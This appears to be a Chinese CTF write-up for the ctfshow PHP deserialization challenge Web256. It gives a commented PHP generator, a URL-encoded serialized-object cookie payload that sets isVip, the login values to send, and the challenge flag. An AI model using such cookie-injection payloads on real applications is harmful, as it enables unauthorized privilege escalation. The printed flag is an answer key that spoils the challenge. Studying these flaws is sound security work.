反序列化
Web256
题目会先判断 password 和 username 是否相等
通过该判断后才会进行反序列化
<?
//ctfshow 反序列化web256
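class ctfShowUser{
    // NOTE(review): every property is public and is written into the serialized
    // string verbatim. The challenge unserializes this class straight from the
    // `user` cookie, so all three fields — isVip included — are client-controlled.
    // That is the weakness the writeup exploits; on the server side the remedy is
    // to never unserialize user-supplied data (keep VIP state server-side, e.g. in
    // the session, and accept only a non-code format such as JSON from the client).
    public $username='1';
    public $password='2';
    // The original read `ture`, an undefined constant: PHP 8 throws
    // "Undefined constant" the first time the class is used, and PHP 7 silently
    // turned it into the (truthy) string "ture" — which is why the recorded
    // payload below carries s:4:"ture" rather than b:1. Both are truthy, so the
    // challenge accepts either; `true` is the intended value.
    public $isVip=true;

    /** Returns the raw isVip value exactly as stored (no coercion). */
    public function checkVip(){
        return $this->isVip;
    }

    /**
     * Strict (===) comparison of both credentials against the stored ones.
     * With the defaults above it is true only for ('1', '2') as strings.
     */
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }

    /**
     * Echoes the flag when isVip is truthy. Relies on a global $flag being
     * defined elsewhere; in this standalone generator it is unset.
     */
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}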
// Serialize a default ctfShowUser and URL-encode the result so it can be
// pasted directly into the `user` cookie (urlencode escapes `;`, `"`, `{` and `}`).
$payload = serialize(new ctfShowUser());
echo urlencode($payload);
?>
O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%222%22%3Bs%3A5%3A%22isVip%22%3Bs%3A4%3A%22ture%22%3B%7D
将上面输出的字符串设置为 user 的 cookie 值
同时给 username 传入 1、给 password 传入 2（与序列化对象中的值保持一致）
得到flag:
ctfshow{80ee37e2-61d2-45ce-958a-3154cb26f873}